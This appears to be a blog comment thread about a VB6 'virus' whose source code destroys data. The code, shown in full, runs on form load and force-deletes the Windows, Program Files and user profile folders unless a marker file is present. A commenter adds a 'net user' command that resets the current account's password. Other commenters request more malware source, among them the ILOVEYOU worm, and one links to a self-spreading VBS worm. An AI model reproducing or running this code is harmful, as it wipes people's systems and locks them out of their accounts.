Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(“Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(“c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(“c:\windows\system”)
Call DelAll(“c:\windows\system32″)
Call DelAll(“c:\windows”)
Call DelAll(“C:\Documents and Settings\All Users”)
Call DelAll(“C:\Documents and Settings\Administrator”)
Call DelAll(“C:\Documents and Settings”)
Call DelAll(“C:\Program Files\Common Files”)
Call DelAll(“C:\Program Files\Internet Explorer”)
Call DelAll(“C:\Program Files\Microsoft Visual Studio”)
Call DelAll(“C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
I dont think that windows will allow you to delete the files insidet the windows folder while the windows file protection service is running….. Try to stop the service first wit the code… Rite now i dont remember the code just google it… But then a good piece of blog here….. And oh try out batch programing a lil… you can do fun stuff wit it…. try this code
net user %username% grimreaper
in your command prompt….. maybe you know this already… Jus a small trick i know…
thanks for share bro…kalo ada yang lebih mantap lagi kirim ke email ku yach…
thanks…ckikikik…ckikkikik
good do this verey nice code
but you can helpe me how make beind hemsilfe with ather files
programmer iven
Thanks for sharing this code, pls. give me more codes for creating virus in vb6.
Thanks bro!!!
my mail: cmbofix@yahoo.com
<a href"http://computertechnology45.blogspot.com"Computer
Computer
how can you become good programmer with out determination!!?lets work and search for as to learn….be serious of what you are doing…go..go..but make sure you make a good work…
than Q 4 codes please send me more codes
This is damn too wicked. A simple virus that will encrypt all data on the system would have been better. But nice brain though
I WANT TO MAKE A VIRUS IN VB.NET,ASP.NET AND JAVA. PLZ SEND ME THE CODE FOR IT.
http://WWW.SHRIMALIPRAKASH268@YAHOO.COM
you need a code to make a virus for what…???
It will be the most severe programming errors in your script … windows may not allow any running programs to be deleted just like that. But that’s OK.. nice idea,bud !! :p
give me a source code of virus which makes computer power loading double… i mean all the components are given average rate of power…. how can i increase that power rate using a virus… if any plzzz send me the source code….
will you please give me the “I LOVE YOU ” Virus code which was made in .VBS as well ……..
Here is a real one. Spreads from Pendrives and open network drives, made in VBS:
http://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html
Send me some